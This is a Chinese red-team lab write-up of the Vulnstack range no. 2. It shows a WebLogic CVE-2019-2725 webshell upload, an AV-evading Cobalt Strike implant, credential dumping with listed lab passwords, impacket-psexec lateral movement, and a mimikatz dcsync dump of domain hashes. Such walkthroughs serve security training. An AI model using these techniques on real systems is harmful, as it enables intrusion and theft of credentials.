ATT&CK实战系列——红队实战(二)

admin 2023年3月22日02:10:01评论82 views字数 2621阅读8分44秒阅读模式

这是红日的第二套靶场,一开始直接通过域管起的weblogic,有点别扭,建议还是通过本地的用户来起weblogic,漏洞利用的点很多,不要局限于这篇文章,可以多尝试尝试其他漏洞。


靶场地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/ 

密码均为:1qaz@WSX

靶场拓扑

ATT&CK实战系列——红队实战(二)

需要自己起一下环境 C:OracleMiddlewareuser_projectsdomainsbase_domainbinstartWebLogic

ATT&CK实战系列——红队实战(二)

端口扫描

nmap -sV -sS -p- -Pn 192.168.85.148

PORT      STATE SERVICE            VERSION
80/tcp open http Microsoft IIS httpd 7.5
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2008 R2 10.50.4000; SP2
3389/tcp open ssl/ms-wbt-server?
7001/tcp open http Oracle WebLogic Server 10.3.6.0 (Servlet 2.5; JSP 2.1; T3 enabled)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
60966/tcp open ms-sql-s Microsoft SQL Server 2008 R2 10.50.4000; SP2
MAC Address: 00:0C:29:68:D3:5F (VMware)
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

80端口是没有东西的,看一下7001端口,这是weblogic的默认端口 访问7001端口,报错页面,应该就能确定这是一个weblogic了

ATT&CK实战系列——红队实战(二)

进入console尝试一下弱口令,结果是不出意外的进不去 直接工具扫一下,直接一把梭了

ATT&CK实战系列——红队实战(二)

ATT&CK实战系列——红队实战(二)

目标机器是存在多个漏洞的,这里使用Weblogic Wls9-async反序列化漏洞,CVE编号为CVE-2019-2725 

影响的版本为:Weblogic 10.x, Weblogic 12.1.3 漏洞描述:

该漏洞是由wls9-async组件导致的,该War包在反序列化处理的时候存在缺陷,可以在/_async/AsyncResponseService路径下构造恶意XML,从而导致在未授权的情况下远程命令执行

先上传一个jsp的木马,方便上传下载文件,这里直接用冰蝎自带的木马 将shell写入下面的路径

C:OracleMiddlewareuser_projectsdomainsbase_domainserversAdminServertmp_WL_internaluddiexplorer5f6ebwwarshell.jsp

关于weblogic上传路径如何选择可以参考:https://www.cnblogs.com/sstfy/p/10350915.html 

然后直接连接http://192.168.85.148:7001/uddiexplorer/shell.jsp即可

ATT&CK实战系列——红队实战(二)

查看一下目标机器的进程,发现是存在360的

ATT&CK实战系列——红队实战(二)

直接丢一个免杀马,上线cs,这里就可以看到这台机器是存在两张网卡

ATT&CK实战系列——红队实战(二)


内网信息收集

首先通过cs抓一下密码,整理一下

本地用户
administrator:Admin@123

域用户 de1ay.com:
mssql:1qaz@WSX
administrator:1qaz@WSX
de1ay:1qaz@WSX

额。。。这里直接拿到域管的密码了,就当看不见,一台机器一台机器的打吧

拿到本地管理员密码,并且目标机器开启3389端口的,尝试登录到机器上,关掉360好做事情

ATT&CK实战系列——红队实战(二)

已经知道目标机器是存在两张网卡的,192.168.85.1/24和10.10.10.1/24 上传fscan扫描一下这两个段 扫描192.168.85.1/24发现还存在一台192.168.85.151的机器,并且存在ms170-10漏洞

ATT&CK实战系列——红队实战(二)

扫描10.10.10.1/24网段,10.10.10.10和10.10.10.201均存在ms17010漏洞

ATT&CK实战系列——红队实战(二)

10.10.10.201和192.168.85.151是一台机器

基本可以确定这两个网段存活的主机了 整理一下主机信息

DC$     DC.de1ay.com    10.10.10.10
PC$ PC.de1ay.com 10.10.10.201,192.168.85.151
WEB$ WEB.de1ay.com 10.10.10.80,192.168.85.148

域管:administrator:1qaz@WSX
域用户:de1ay:1qaz@WSX,mssql:1qaz@WSX

既然PC这台机器是有外网IP的,那么直接通过msf打一下ms170-010 不出意外根本打不通

ATT&CK实战系列——红队实战(二)

3389端口也连接不上....

先放一下看一下域控吧 设置一下cs的代理 可直接通过de1ay用户横向到DC,并且是system权限

proxychains4 impacket-psexec de1ay.com/de1ay:1qaz@[email protected]

ATT&CK实战系列——红队实战(二)

直接通过cs自带的功能上线DC

ATT&CK实战系列——红队实战(二)

ATT&CK实战系列——红队实战(二)

上传mimikatz直接通过dcsync获取域内所有用户的hash

lsadump::dcsync /domain:de1ay.com /all /csv

ATT&CK实战系列——红队实战(二)

直接通过域管的hash上线PC机器,三台机器全部上线cs

ATT&CK实战系列——红队实战(二)






     ▼
更多精彩推荐,请关注我们


请严格遵守网络安全法相关条例!此分享主要用于学习,切勿走上违法犯罪的不归路,一切后果自付!


ATT&CK实战系列——红队实战(二)



原文始发于微信公众号(鸿鹄实验室):ATT&CK实战系列——红队实战(二)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年3月22日02:10:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   ATT&CK实战系列——红队实战(二)https://cn-sec.com/archives/1620306.html

发表评论

匿名网友 填写信息